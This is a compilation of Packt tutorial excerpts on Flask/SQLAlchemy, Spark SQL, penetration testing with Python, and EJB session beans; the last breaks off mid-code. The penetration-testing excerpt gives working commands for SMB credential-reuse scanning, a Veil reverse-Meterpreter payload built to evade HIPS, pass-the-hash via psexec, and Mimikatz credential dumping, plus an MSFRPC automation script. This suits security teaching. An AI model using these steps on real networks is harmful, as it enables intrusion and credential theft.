
Snap – The Code Snippet Sharing Application

Packt
24 Sep 2015
8 min read
In this article by Joel Perras, author of the book Flask Blueprints, we will build our first fully functional, database-backed application. This application, with the codename Snap, will allow users to create an account with a username and password. Users will be able to add, update, and delete so-called semiprivate snaps of text (with a focus on lines of code) that can be shared with others.

For this you should be familiar with at least one of the following relational database systems: PostgreSQL, MySQL, or SQLite. Additionally, some knowledge of the SQLAlchemy Python library, which acts as an abstraction layer and object-relational mapper for these (and several other) databases, will be an asset. If you are not well versed in the usage of SQLAlchemy, fear not. We will have a gentle introduction to the library that will bring new developers up to speed and serve as a refresher for the more experienced folks.

The SQLite database will be our relational database of choice due to its very simple installation and operation. The other database systems that we listed are all client/server-based, with a multitude of configuration options that may need adjustment depending on the system they are installed on, while SQLite's default mode of operation is self-contained, serverless, and zero-configuration. That said, any major relational database supported by SQLAlchemy as a first-class citizen will do.

Diving In

To make sure things start correctly, let's create a folder where this project will exist and a virtual environment to encapsulate any dependencies that we will require:

```
$ mkdir -p ~/src/snap && cd ~/src/snap
$ mkvirtualenv snap -i flask
```

This will create a folder called snap at the given path and take us to this newly created folder. It will then create the snap virtual environment and install Flask in this environment. Remember that the mkvirtualenv tool will create the virtual environment, which will be the default set of locations to install packages from pip, but it does not create the project folder for you. This is why we run a command to create the project folder first and then create the virtual environment. Virtual environments, by virtue of the $PATH manipulation performed once they are activated, are completely independent of where in your filesystem your project files exist.

We will then create our basic blueprint-based project layout with an empty users blueprint:

```
application
├── __init__.py
├── run.py
└── users
    ├── __init__.py
    ├── models.py
    └── views.py
```

Flask-SQLAlchemy

Once this has been established, we need to install the next important set of dependencies: SQLAlchemy, and the Flask extension that makes interacting with this library a bit more Flask-like, Flask-SQLAlchemy:

```
$ pip install flask-sqlalchemy
```

This will install the Flask extension to SQLAlchemy along with the base distribution of the latter and several other necessary dependencies, in case they are not already present. Now, if we were using a relational database system other than SQLite, this is the point where we would create the database entity in, say, PostgreSQL, along with the proper users and permissions, so that our application can create tables and modify their contents. SQLite, however, does not require any of that. Instead, it assumes that any user who has access to the filesystem location where the database is stored should also have permission to modify the contents of that database.
For the sake of completeness, however, here is how one would create an empty database in the current folder of your filesystem:

```
$ sqlite3 snap.db   # hit Ctrl-D to escape out of the interactive SQL console if necessary
```

As mentioned previously, we will be using SQLite as the database for our example applications and the directions given will assume that SQLite is being used; the exact name of the binary may differ on your system. You can substitute the equivalent commands to create and administer the database of your choice if anything other than SQLite is being used.

Now, we can begin the basic configuration of the Flask-SQLAlchemy extension.

Configuring Flask-SQLAlchemy

First, we must register the Flask-SQLAlchemy extension with the application object in application/__init__.py:

```python
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy

app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///../snap.db'
db = SQLAlchemy(app)
```

The value of app.config['SQLALCHEMY_DATABASE_URI'] is the escaped relative path to the snap.db SQLite database that we created previously. Once this simple configuration is in place, we will be able to create the SQLite database automatically via the db.create_all() method, which can be invoked in an interactive Python shell:

```
$ python
>>> from application import db
>>> db.create_all()
```

This is an idempotent operation, which means that nothing changes even if the database already exists. If the local database file does not exist, however, it will be created. This also applies to adding new data models: running db.create_all() will add their definitions to the database, ensuring that the relevant tables have been created and are accessible. It does not, however, take into account the modification of an existing model/table definition that already exists in the database. For this, you will need to use the relevant tools (for example, the sqlite CLI) to modify the corresponding table definitions to match those that have been updated in your models, or use a more general schema tracking and updating tool such as Alembic to do the majority of the heavy lifting for you.

SQLAlchemy basics

SQLAlchemy is, first and foremost, a toolkit for interacting with relational databases in Python. While it provides an incredible number of features—including SQL connection handling and pooling for various database engines, the ability to handle custom datatypes, and a comprehensive SQL expression API—the one feature that most developers are familiar with is the Object Relational Mapper. This mapper allows a developer to connect a Python object definition to a SQL table in the database of their choice, giving them the flexibility to control the domain models in their own application while requiring only minimal coupling to the database product and the engine-specific SQLisms that each of them exposes.

While debating the usefulness (or the lack thereof) of an object relational mapper is outside the scope of this article, for those who are unfamiliar with SQLAlchemy we will provide a list of benefits that using this tool brings to the table:

- Your domain models are written to interface with one of the most well-respected, tested, and deployed Python packages ever created—SQLAlchemy.
- Onboarding new developers to a project becomes an order of magnitude easier due to the extensive documentation, tutorials, books, and articles that have been written about using SQLAlchemy.
- Queries written using the SQLAlchemy expression language are validated at import time, instead of having to execute each query string against the database to determine whether a syntax error is present. The expression language is in Python and can thus be validated with your usual set of tools and IDE.
- Thanks to the implementation of design patterns such as the Unit of Work, the Identity Map, and various lazy loading features, the developer can often be saved from performing more database/network round trips than necessary. Considering that the majority of a request/response cycle in a typical web application can easily be attributed to network latency of one form or another, minimizing the number of database queries in a typical response is a net performance win on many fronts.
- While many successful, performant applications can be built entirely on the ORM, SQLAlchemy does not force it upon you. If, for some reason, it is preferable to write raw SQL query strings or to use the SQLAlchemy expression language directly, then you can do that and still benefit from the connection pooling and the Python DBAPI abstraction functionality that is the core of SQLAlchemy itself.

Now that we've given you several reasons why you should be using this database query and domain data abstraction layer, let's look at how we would go about defining a basic data model.
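The excerpt ends before the model definition it promises, so purely for orientation, here is a minimal sketch of what a first model in application/users/models.py might look like under the configuration above. The class name, column names, and sizes are illustrative assumptions, not code taken from the book:

```python
# application/users/models.py -- a minimal, hypothetical sketch of a first model.
# The field names and sizes below are assumptions for illustration only.
from application import db


class User(db.Model):
    """A user who can sign up and create semiprivate snaps."""
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(40), unique=True, nullable=False)
    password = db.Column(db.String(255), nullable=False)  # store a password hash, never plain text

    def __repr__(self):
        return '<User %r>' % self.username
```

With a definition like this imported, running db.create_all() from the interactive shell, as shown earlier, would create the corresponding table in snap.db.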
Summary

After having gone through this article, we have seen several facets of how Flask may be augmented with the use of extensions. While Flask itself is relatively spartan, the ecosystem of extensions that is available makes it possible to build a fully fledged, user-authenticated application quickly and relatively painlessly.


Integration with Spark SQL

Packt
24 Sep 2015
11 min read
In this article by Sumit Gupta, the author of the book Learning Real-time Processing with Spark Streaming, we will discuss the integration of Spark Streaming with other advanced Spark libraries such as Spark SQL.

No single piece of software in today's world can fulfill the varied, versatile, and complex demands of the enterprise, and to be honest, neither should it! Software is made to fulfill specific needs arising in the enterprise at a particular point in time, needs which may change in the future due to many other factors. These factors may or may not be controllable, such as government policies, business/market dynamics, and many more. Considering all these factors, the integration and interoperability of any software system with internal/external systems and software is pivotal in fulfilling enterprise needs. Integration and interoperability are categorized as nonfunctional requirements, which are always implicit and may or may not be explicitly stated by the end users. Over time, architects have realized the importance of these implicit requirements in modern enterprises, and now all enterprise architectures provide due diligence and provisions for fulfilling them. Even enterprise architecture frameworks such as The Open Group Architecture Framework (TOGAF) define specific sets of procedures and guidelines for defining and establishing the interoperability and integration requirements of modern enterprises.

The Spark community realized the importance of both these factors and provided a versatile and scalable framework with certain hooks for integration and interoperability with different systems and libraries. For example, data consumed and processed via Spark Streaming can also be loaded into a structured (table: rows/columns) format and further queried using SQL. The data can even be stored as persistent Hive tables in HDFS, which will exist even after our Spark program has restarted. In this article, we will discuss querying streaming data in real time using Spark SQL.

Querying streaming data in real time

Spark Streaming is developed on the principle of integration and interoperability: it not only provides a framework for consuming data in near real time from varied data sources, but also provides integration with Spark SQL, where existing DStreams can be converted into a structured data format for querying using standard SQL constructs. There are many use cases where SQL on streaming data is a much-needed feature; for example, in our distributed log analysis use case, we may need to combine precomputed datasets with the streaming data to perform exploratory analysis using interactive SQL queries, which is difficult to implement with streaming operators alone, as they are not designed for introducing new datasets and performing ad hoc queries. Moreover, SQL's success at expressing complex data transformations derives from the fact that it is based on a set of very powerful data processing primitives that do filtering, merging, correlation, and aggregation, which are not available in low-level programming languages such as Java/C++ and may result in long development cycles and high maintenance costs.

Let's move forward and first understand a few things about Spark SQL, and then we will also see the process of converting existing DStreams into structured formats.
Understanding Spark SQL

Spark SQL is one of the modules developed over the Spark framework for processing structured data, which is stored in the form of rows and columns. At a very high level, it is similar to data residing in an RDBMS in the form of rows and columns, on which SQL queries are executed for performing analysis, but Spark SQL is much more versatile and flexible than an RDBMS. Spark SQL provides distributed processing of SQL queries and can be compared to frameworks such as Hive, Impala, or Drill. Here are a few notable features of Spark SQL:

- Spark SQL is capable of loading data from a variety of data sources, such as text files, JSON, Hive, HDFS, the Parquet format, and of course RDBMSes too, so that we can consume, join, and process datasets from different and varied data sources.
- It supports static and dynamic schema definition for the data loaded from various sources, which helps in defining the schema for known data structures/types, and also for those datasets where the columns and their types are not known until runtime.
- It can work as a distributed query engine using the Thrift JDBC/ODBC server or the command-line interface, where end users or applications can interact with Spark SQL directly to run SQL queries.
- Spark SQL provides integration with Spark Streaming, where DStreams can be transformed into a structured format and SQL queries can then be executed against them.
- It is capable of caching tables using an in-memory columnar format for faster reads and in-memory data processing.
- It supports schema evolution, so that new columns can be added to or deleted from the existing schema, while Spark SQL maintains compatibility between all versions of the schema.

Spark SQL defines a higher level of programming abstraction called DataFrames, which is also an extension to the existing RDD API. DataFrames are distributed collections of objects in the form of rows and named columns, similar to tables in an RDBMS, but with much richer functionality encompassing all the previously listed features. The DataFrame API is inspired by the concepts of data frames in R (http://www.r-tutor.com/r-introduction/data-frame) and Python (http://pandas.pydata.org/pandas-docs/stable/dsintro.html#dataframe).

Let's move ahead and understand how Spark SQL works with the help of an example. As a first step, let's create sample JSON data about the basic information of the company's departments, such as Name, Employees, and so on, and save this data into the file company.json. The JSON file would look like this:

```json
[
  { "Name": "DEPT_A", "No_Of_Emp": 10, "No_Of_Supervisors": 2 },
  { "Name": "DEPT_B", "No_Of_Emp": 12, "No_Of_Supervisors": 2 },
  { "Name": "DEPT_C", "No_Of_Emp": 14, "No_Of_Supervisors": 3 },
  { "Name": "DEPT_D", "No_Of_Emp": 10, "No_Of_Supervisors": 1 },
  { "Name": "DEPT_E", "No_Of_Emp": 20, "No_Of_Supervisors": 5 }
]
```

You can use any online JSON editor, such as http://codebeautify.org/online-json-editor, to see and edit the data defined in the preceding JSON code.

Next, let's extend our Spark-Examples project and create a new package by the name chapter.six, and within this new package, create a new Scala object and name it ScalaFirstSparkSQL.scala.
Next, add the following import statements just below the package declaration:

```scala
import org.apache.spark.SparkConf
import org.apache.spark.SparkContext
import org.apache.spark.sql._
import org.apache.spark.sql.functions._
```

Further, in your main method, add the following set of statements to create an SQLContext from the SparkContext:

```scala
// Creating Spark Configuration
val conf = new SparkConf()
// Setting Application/Job Name
conf.setAppName("My First Spark SQL")
// Define Spark Context which we will use to initialize our SQL Context
val sparkCtx = new SparkContext(conf)
// Creating SQL Context
val sqlCtx = new SQLContext(sparkCtx)
```

SQLContext, or any of its descendants, such as HiveContext (for working with Hive tables) or CassandraSQLContext (for working with Cassandra tables), is the main entry point for accessing all functionality of Spark SQL. It allows the creation of DataFrames, and also provides the functionality to fire SQL queries over DataFrames.

Next, we will define the following code to load the JSON file (company.json) using the SQLContext, and we will also create a DataFrame:

```scala
// Define path of your JSON file (company.json) which needs to be processed
val path = "/home/softwares/spark/data/company.json"
// Use SQLContext and load the JSON file.
// This will return the DataFrame which can be further queried using SQL queries.
val dataFrame = sqlCtx.jsonFile(path)
```

In the preceding piece of code, we used the jsonFile(…) method for loading the JSON data. There are other utility methods defined by SQLContext for reading raw data from the filesystem, creating DataFrames from existing RDDs, and many more.

Spark SQL supports two different methods for converting existing RDDs into DataFrames. The first method uses reflection to infer the schema of an RDD from the given data. This approach leads to more concise code and helps in instances where we already know the schema while writing the Spark application. We have used the same approach in our example. The second method is through a programmatic interface that allows us to construct a schema and then apply it to an existing RDD, finally generating a DataFrame. This method is more verbose, but provides flexibility and helps in those instances where columns and data types are not known until the data is received at runtime. Refer to https://spark.apache.org/docs/1.3.0/api/scala/index.html#org.apache.spark.sql.SQLContext for a complete list of methods exposed by SQLContext.

Once the DataFrame is created, we need to register it as a temporary table within the SQL context so that we can execute SQL queries over the registered table. Let's add the following piece of code for registering our DataFrame with our SQL context under the name company:

```scala
// Register the data as a temporary table within SQL Context.
// A temporary table is destroyed as soon as the SQL Context is destroyed.
dataFrame.registerTempTable("company")
```

And we are done. Our JSON data is automatically organized into a table (rows/columns) and is ready to accept SQL queries. Even the data types are inferred from the type of data entered within the JSON file itself.

Now, we will start executing SQL queries on our table, but before that, let's see the schema being created/defined by the SQLContext:

```scala
// Printing the Schema of the Data loaded in the DataFrame
dataFrame.printSchema()
```

The execution of the preceding statement prints the schema of the JSON data loaded by Spark SQL (the book shows the result as a screenshot). Pretty simple and straightforward, isn't it?
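Since the screenshot is not reproduced in this excerpt, here is roughly what the printed schema would look like for the company.json sample defined earlier (a reconstruction, not output copied from the book):

```
root
 |-- Name: string (nullable = true)
 |-- No_Of_Emp: long (nullable = true)
 |-- No_Of_Supervisors: long (nullable = true)
```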
Spark SQL has automatically created our schema based on the data defined in our company.json file. It has also defined the data type of each of the columns. We can also define the schema using reflection (https://spark.apache.org/docs/1.3.0/sql-programming-guide.html#inferring-the-schema-using-reflection) or define it programmatically (https://spark.apache.org/docs/1.3.0/sql-programming-guide.html#programmatically-specifying-the-schema).

Next, let's execute some SQL queries to see the data stored in the DataFrame. The first SQL query will print all records:

```scala
// Executing SQL Queries to print all records in the DataFrame
println("Printing All records")
sqlCtx.sql("Select * from company").collect().foreach(print)
```

The execution of the preceding statement produces results on the console where the driver is executed (shown as a screenshot in the book).

Next, let's select only a few columns instead of all records and print them on the console:

```scala
// Executing SQL Queries to print Name and Employees
// in each Department
println("\n Printing Number of Employees in All Departments")
sqlCtx.sql("Select Name, No_Of_Emp from company").collect().foreach(println)
```

Again, the results appear on the console where the driver is executed.

Now, finally, let's do some aggregation and count the total number of employees across the departments:

```scala
// Using the aggregate function (agg) to print the
// total number of employees in the Company
println("\n Printing Total Number of Employees in Company_X")
val allRec = sqlCtx.sql("Select * from company").agg(Map("No_Of_Emp" -> "sum"))
allRec.collect.foreach(println)
```

In the preceding piece of code, we used the agg(…) function and performed the sum of all employees across the departments, where sum can be replaced by avg, max, min, or count. The results of the aggregation on our company.json data are printed on the driver console. Refer to the DataFrame API at https://spark.apache.org/docs/1.3.0/api/scala/index.html#org.apache.spark.sql.DataFrame for further information on the available aggregation functions.

As a last step, we will stop our Spark SQL context by invoking the stop() function on the SparkContext: sparkCtx.stop(). This is required so that your application can notify the master or resource manager to release all resources allocated to the Spark job. It also ensures the graceful shutdown of the job and avoids any resource leakage, which may happen otherwise. Also, as of now, there can be only one active Spark context per JVM, and we need to stop() the active SparkContext class before creating a new one.

Summary

In this article, we have seen the step-by-step process of using Spark SQL as a standalone program. Though we have considered JSON files as an example, we can also leverage Spark SQL with Cassandra (https://github.com/datastax/spark-cassandra-connector/blob/master/doc/2_loading.md), MongoDB (https://github.com/Stratio/spark-mongodb), or Elasticsearch (http://chapeau.freevariable.com/2015/04/elasticsearch-and-spark-1-dot-3.html).


Exploiting Services with Python

Packt
24 Sep 2015
15 min read
In this article by Christopher Duffy, author of the book Learning Python Penetration Testing, we will look at testing for the synchronization of account credentials. One of the big misconceptions in testing today is the prevalence of exploitable memory corruption flaws: you will still find vulnerabilities that can be exploited by overflowing the stack or heap, but they are significantly reduced in number or more complex to exploit.

Testing for the synchronization of account credentials

With these results, we can determine whether any of these credentials are reused in the network. We know there are primarily Windows hosts in the target network, but we need to identify which ones have port 445 open. We can then try to determine which accounts might grant us access when the following command is run:

```
nmap -sS -vvv -p445 192.168.195.0/24 -oG output
```

Then, parse the results for open ports with the following command, which will produce a file of target hosts with Server Message Block (SMB) enabled:

```
grep 445/open output | cut -d" " -f2 >> smb_hosts
```

The passwords can be extracted directly from John and written to a password file that can be used for follow-on service attacks:

```
john --show unshadowed | cut -d: -f2 | grep -v " " > passwords
```

Always test on a single host the first time you run this type of attack. In this example, we are using the sys account, but it is more common to use the root account or similar administrative accounts to test password reuse (synchronization) in an environment. The following attack, using auxiliary/scanner/smb/smb_enumusers_domain, will check for two things: it will identify which systems this account has access to, and the relevant users that are currently logged into those systems. In the second portion of this example, we will highlight how to identify the accounts that are actually privileged and part of the Domain.

There are good points and bad points about the smb_enumusers_domain module. The bad point is that you cannot load multiple usernames and passwords into it; that capability is reserved for the smb_login module. The problem with smb_login is that it is extremely noisy, as many signature detection tools flag on this method of testing for logins. A third module, smb_enumusers, can also be used, but it only provides details related to local users, as it identifies users based on the Security Accounts Manager (SAM) file contents. So, if a user has a Domain account and has logged into the box, the smb_enumusers module will not identify them. So, understand each module and its limitations when identifying targets to move to laterally.

We are going to highlight how to configure the smb_enumusers_domain module and execute it. This will show an example of gaining access to a vulnerable host and then verifying DA account membership. This information can then be used to identify where a DA is located so that Mimikatz can be used to extract credentials. For this example, we are also going to use a custom exploit built with Veil, to attempt to bypass a resident Host Intrusion Prevention System (HIPS). More information about Veil can be found at https://github.com/Veil-Framework/Veil-Evasion.git.

So, we configure the module to use the password batman, and we target the local administrator account on the system. This can be changed, but often the default is used. Since it is the local administrator, the Domain is set to WORKGROUP.
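The book presents this configuration as a screenshot; in the console it corresponds roughly to the following commands (a sketch based on the options just described; the RHOSTS value and spool file path are assumptions, not values taken from the book):

```
use auxiliary/scanner/smb/smb_enumusers_domain
set SMBUser Administrator
set SMBPass batman
set SMBDomain WORKGROUP
set RHOSTS file:/root/smb_hosts
spool /root/smb_enum_results.log
run
```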
Before running commands such as these, make sure to use spool to output the results to a log file so that you can go back and review them. As you can see in the book's output figure, the module provided details about who was logged into the system. This means that there are logged-in users relevant to the returned account names and that the local administrator account will work on that system. This means the system is ripe for compromise by a Pass-the-Hash (PtH) attack. The psexec module allows you to pass either the extracted Local Area Network Manager (LM):New Technology LM (NTLM) hash and username combination or just the username and password pair to get access.

To begin with, we set up a custom multi/handler to catch the custom exploit we generated with Veil (shown as a screenshot in the book). Keep in mind that I used 443 for the local port because it bypasses most HIPS, and the local host will change depending on your host. Now, we need to generate custom payloads with Veil to be used with the psexec module. You can do this by navigating to the Veil-Evasion installation directory and running it with python Veil-Evasion.py.

Veil has a good number of payloads that can be generated with a variety of obfuscation or protection mechanisms; to see the specific payload you want to use, execute the list command. You can select the payload by typing in the number of the payload or its name. As an example, run the following commands to generate a C# stager that does not use shellcode; keep in mind that this requires specific versions of .NET on the target box to work:

```
use cs/meterpreter/rev_tcp
set LPORT 443
set LHOST 192.168.195.160
set use_arya Y
generate
```

There are two components to a typical payload: the stager and the stage. A stager sets up the network connection between the attacker and the victim; payloads that use native system languages can often be purely a stager. The second part is the stage, which comprises the components that are downloaded by the stager. These can include things like your Meterpreter. If both items are combined, they are called a single; think about when you create your malicious Universal Serial Bus (USB) drives, as these are often singles.

The output will be an executable that will spawn an encrypted reverse HyperText Transfer Protocol Secure (HTTPS) Meterpreter. The payload can be tested with the checkvt script, which safely verifies whether the payload would be picked up by most HIPS solutions. It does this without uploading it to VirusTotal, and in turn does not add the payload to the database that many HIPS providers pull from. Instead, it compares the hash of the payload to those already in the database.

Now, we can set up the psexec module to reference the custom payload for execution. Update the psexec module so that it uses the custom payload generated by Veil-Evasion via set EXE::Custom, and disable the automatic payload handler with set DisablePayloadHandler true, as shown in the book.

Exploit the target box, and then attempt to identify who the DAs are in the Domain. This can be done in one of two ways: either by using the post/windows/gather/enum_domain_group_users module or with the following command from shell access:

```
net group "Domain Admins"
```

We can then grep through the spooled output file from the previously run module to locate relevant systems that might have these DAs logged in. When gaining access to one of those systems, there will likely be DA tokens or credentials in memory, which can be extracted and reused.
The following command is an example of how to analyze the log file for these types of entries:

```
grep <username> <spoolfile.log>
```

As you can see, this very simple exploit path allows you to identify where the DAs are. Once you are on the system, all you have to do is load Mimikatz and extract the credentials, typically with the wdigest command from the established Meterpreter session. Of course, this means the system has to be newer than Windows 2000 and have active credentials in memory. If not, it will take additional effort and research to move forward. To highlight this, we use our established session to extract credentials with Mimikatz, as shown in the book. The credentials are in memory, and since the target box was a Windows XP machine, we have no conflicts and no additional research is required. In addition to the intelligence we have gathered from extracting the active DA list from the system, we now have another set of confirmed credentials that can be used. Rinsing and repeating this method of attack allows you to quickly move laterally around the network until you identify viable targets.

Automating the exploit train with Python

This exploit train is relatively simple, but we can automate a portion of it with the Metasploit Remote Procedure Call (MSFRPC). This script will use the nmap library to scan for active instances of port 445 and then generate a list of targets to test using a username and password passed via arguments to the script. The script will use the same smb_enumusers_domain module to identify boxes that have the credentials reused and other viable users logged into them. First, we need to install SpiderLabs' msfrpc library for Python. This library can be found at https://github.com/SpiderLabs/msfrpc.git.

The script we are creating uses the netifaces library to identify which interface IP addresses belong to your host. It then scans for port 445, the SMB port, on the IP address, range, or Classless Inter-Domain Routing (CIDR) address. It eliminates any IP addresses that belong to your interfaces and then tests the credentials using the Metasploit module auxiliary/scanner/smb/smb_enumusers_domain. At the same time, it verifies which users are logged onto the system. The outputs of this script, in addition to the real-time responses, are two files: a log file that contains all the responses, and a file that holds the IP addresses of all the hosts that have SMB services. This Metasploit module takes advantage of RPCDCE, which does not run on port 445, but we are verifying that the service is available for follow-on exploitation. This file could then be fed back into the script if you, as an attacker, find other credential sets to test. Lastly, the script can be passed hashes directly, just like the Metasploit module.

The output will be slightly different for each run of the script, depending on the console identifier you grab to execute the command. The only real difference will be the additional banner items typical of a Metasploit console initiation. Now, there are a couple of things that have to be stated: yes, you could just generate a resource file, but when you start getting into organizations that have millions of IP addresses, this becomes unmanageable. Also, the MSFRPC can have resource files fed directly into it as well, but this can significantly slow the process. If you want to compare, rewrite this script to do the same test as the ssh_login.py script you wrote previously, but with direct MSFRPC integration.
Like all scripts, the libraries need to be established first. Most of these you are already familiar with; the newest one relates to the MSFRPC library by SpiderLabs. The required libraries for this script can be seen as follows:

```python
import os, argparse, sys, time
try:
    import msfrpc
except:
    sys.exit("[!] Install the msfrpc library that can be found here: https://github.com/SpiderLabs/msfrpc.git")
try:
    import nmap
except:
    sys.exit("[!] Install the nmap library: pip install python-nmap")
try:
    import netifaces
except:
    sys.exit("[!] Install the netifaces library: pip install netifaces")
```

We then build a module to identify the relevant targets that are going to have the auxiliary module run against them. First, we set up the constructors and the passed parameters. Notice that we have two service names to test against for this script, microsoft-ds and netbios-ssn, as either one could represent port 445 based on the nmap results.

```python
def target_identifier(verbose, dir, user, passwd, ips, port_num, ifaces, ipfile):
    hostlist = []
    pre_pend = "smb"
    service_name = "microsoft-ds"
    service_name2 = "netbios-ssn"
    protocol = "tcp"
    port_state = "open"
    bufsize = 0
    hosts_output = "%s/%s_hosts" % (dir, pre_pend)
    scanner = nmap.PortScanner()  # nmap scanner object; its creation is not shown in the original excerpt
```

After this, we configure the nmap scanner to scan for details either by file or by command line. Notice that hostlist is a string of all the addresses loaded from the file, separated by spaces. The ipfile is opened and read, and then all newlines are replaced with spaces as they are loaded into the string. This is a requirement for the specific hosts argument of the nmap library.

```python
    if ipfile != None:
        if verbose > 0:
            print("[*] Scanning for hosts from file %s") % (ipfile)
        with open(ipfile) as f:
            hostlist = f.read().replace('\n', ' ')
        scanner.scan(hosts=hostlist, ports=port_num)
    else:
        if verbose > 0:
            print("[*] Scanning for host(s) %s") % (ips)
        scanner.scan(ips, port_num)
    open(hosts_output, 'w').close()
    hostlist = []
    if scanner.all_hosts():
        e = open(hosts_output, 'a', bufsize)
    else:
        sys.exit("[!] No viable targets were found!")
```

The IP addresses of all the interfaces on the attack system are removed from the test pool.

```python
    for host in scanner.all_hosts():
        for k, v in ifaces.iteritems():
            if v['addr'] == host:
                print("[-] Removing %s from target list since it belongs to your interface!") % (host)
                host = None
```

Finally, the details are written to the relevant output file and Python lists, and then returned to the original caller.

```python
        if host != None:
            e = open(hosts_output, 'a', bufsize)
            # Check both possible service names for port 445
            if service_name in scanner[host][protocol][int(port_num)]['name'] or service_name2 in scanner[host][protocol][int(port_num)]['name']:
                if port_state in scanner[host][protocol][int(port_num)]['state']:
                    if verbose > 0:
                        print("[+] Adding host %s to %s since the service is active on %s") % (host, hosts_output, port_num)
                    hostdata = host + "\n"
                    e.write(hostdata)
                    hostlist.append(host)
            else:
                if verbose > 0:
                    print("[-] Host %s is not being added to %s since the service is not active on %s") % (host, hosts_output, port_num)
    if not scanner.all_hosts():
        e.close()
    if hosts_output:
        return hosts_output, hostlist
```

The next function creates the actual command that will be executed; this function will be called for each host that the scan returned as a potential target.
```python
def build_command(verbose, user, passwd, dom, port, ip):
    module = "auxiliary/scanner/smb/smb_enumusers_domain"
    command = '''use ''' + module + '''
set RHOSTS ''' + ip + '''
set SMBUser ''' + user + '''
set SMBPass ''' + passwd + '''
set SMBDomain ''' + dom + '''
run
'''
    return command, module
```

The last function actually initiates the connection with the MSFRPC and executes the relevant command for each specific host.

```python
def run_commands(verbose, iplist, user, passwd, dom, port, file):
    bufsize = 0
    e = open(file, 'a', bufsize)
    done = False
```

The script creates a connection with the MSFRPC and creates a console, which it then tracks by a specific console_id. Do not forget that the msfconsole can have multiple sessions, and as such we have to track our session by its console_id.

```python
    client = msfrpc.Msfrpc({})
    client.login('msf', 'msfrpcpassword')
    try:
        result = client.call('console.create')
    except:
        sys.exit("[!] Creation of console failed!")
    console_id = result['id']
    console_id_int = int(console_id)
```

The script then iterates over the list of IP addresses that were confirmed to have an active SMB service and creates the necessary commands for each of those IP addresses.

```python
    for ip in iplist:
        if verbose > 0:
            print("[*] Building custom command for: %s") % (str(ip))
        command, module = build_command(verbose, user, passwd, dom, port, ip)
        if verbose > 0:
            print("[*] Executing Metasploit module %s on host: %s") % (module, str(ip))
```

The command is then written to the console and we wait for the results.

```python
        client.call('console.write', [console_id, command])
        time.sleep(1)
        while done != True:
```

We await the results for each command execution, verifying the data that has been returned and that the console is not still running. If it is, we delay the reading of the data. Once it has completed, the results are written to the specified output file.

```python
            result = client.call('console.read', [console_id_int])
            if len(result['data']) > 1:
                if result['busy'] == True:
                    time.sleep(1)
                    continue
                else:
                    console_output = result['data']
                    e.write(console_output)
                    if verbose > 0:
                        print(console_output)
                    done = True
```

We close the file and destroy the console to clean up the work we have done.

```python
    e.close()
    client.call('console.destroy', [console_id])
```

The final pieces of the script are related to setting up the arguments, setting up the constructors, and calling the modules. These components are similar to previous scripts and have not been included here for the sake of space, but the details can be found at the previously mentioned location on GitHub. The last requirement is loading msgrpc in the msfconsole with the specific password that we want. So launch the msfconsole and then execute the following within it:

```
load msgrpc Pass=msfrpcpassword
```

The command was not mistyped; Metasploit has moved to msgrpc versus msfrpc, but everyone still refers to it as msfrpc. The big difference is that the msgrpc library uses POST requests to send data, while msfrpc used eXtensible Markup Language (XML). All of this can be automated with resource files to set up the service.

Summary

In this article, we highlighted a manner in which you can move through a sample environment. Specifically, we showed how to exploit a relevant box, escalate privileges, and extract additional credentials. From that position, we identified other viable hosts we could laterally move into and the users who were currently logged into them. We generated custom payloads with the Veil Framework to bypass HIPS, and executed a PtH attack. This allowed us to extract other credentials from memory with the tool Mimikatz.
We then automated the identification of viable secondary targets, and the users logged into them, with Python and the MSFRPC.


Creating a JEE Application with EJB

Packt
24 Sep 2015
11 min read
In this article by Ram Kulkarni, author of Java EE Development with Eclipse (e2), we will be using EJBs (Enterprise Java Beans) to implement business logic. This is ideal in scenarios where you want the components that process business logic to be distributed across different servers. But that is just one of the advantages of EJB. Even if you use EJBs on the same server as the web application, you may gain from a number of services that the EJB container provides to applications through EJBs. You can specify security constraints for calling EJB methods declaratively (using annotations), and you can also easily specify transaction boundaries (which method calls form a part of one transaction) using annotations. In addition to this, the container handles the life cycle of EJBs, including pooling of certain types of EJB objects so that more objects can be created when the load on the application increases.

In this article, we will create the same application using EJBs and deploy it in a GlassFish 4 server. But before that, you need to understand some basic concepts of EJBs.

Types of EJB

As per the EJB 3 specification, EJBs can be of the following types:

- Session bean:
  - Stateful session bean
  - Stateless session bean
  - Singleton session bean
- Message-driven bean

In this article, we will focus on session beans.

Session beans

In general, session beans are meant to contain the methods used to execute the main business logic of enterprise applications. Any Plain Old Java Object (POJO) can be annotated with the appropriate EJB-3-specific annotations to make it a session bean. Session beans come in three types, as follows.

Stateful session bean

A stateful session bean serves requests for one client only. There is a one-to-one mapping between the stateful session bean and the client. Therefore, stateful beans can hold state data for the client between multiple method calls. In our CourseManagement application, we can use a stateful bean to hold the Student data (the student profile and the courses taken by them) after a student logs in. The state maintained by the stateful bean is lost when the server restarts or when the session times out. Since there is one stateful bean per client, using stateful beans might impact the scalability of the application. We use the @Stateful annotation to create a stateful session bean.

Stateless session bean

A stateless session bean does not hold any state information for any client. Therefore, one session bean can be shared across multiple clients. The EJB container maintains pools of stateless beans, and when a client request comes in, it takes a bean out of the pool, executes methods on it, and returns the bean to the pool. Stateless session beans provide excellent scalability because they can be shared and need not be created for each client. We use the @Stateless annotation to create a stateless session bean.

Singleton session bean

As the name suggests, there is only one instance of a singleton bean class in the EJB container (this is true in a clustered environment too; each EJB container will have an instance of the singleton bean). This means that singleton beans are shared by multiple clients, and they are not pooled by EJB containers (because there can be only one instance). Since a singleton session bean is a shared resource, we need to manage concurrency in it. Java EE provides two concurrency management options for singleton session beans: container-managed concurrency and bean-managed concurrency.
Container-managed concurrency can easily be specified using annotations. See https://docs.oracle.com/javaee/7/tutorial/ejb-basicexamples002.htm#GIPSZ for more information on managing concurrency in a singleton session bean. Using a singleton bean could have an impact on the scalability of the application if there are resource contentions in the code. We use the @Singleton annotation to create a singleton session bean.

Accessing a session bean from the client

Session beans can be designed to be accessed locally (within the same application as the session bean), remotely (from a client running in a different application or JVM), or both. In the case of remote access, session beans are required to implement a remote interface. For local access, session beans can implement a local interface or no interface (the no-interface view of a session bean). The remote and local interfaces that session beans implement are sometimes also called business interfaces, because they typically expose the primary business functionality.

Creating a no-interface session bean

To create a session bean with a no-interface view, create a POJO and annotate it with the appropriate EJB annotation type and @LocalBean. For example, we can create a local Student session bean as follows:

```java
import javax.ejb.LocalBean;
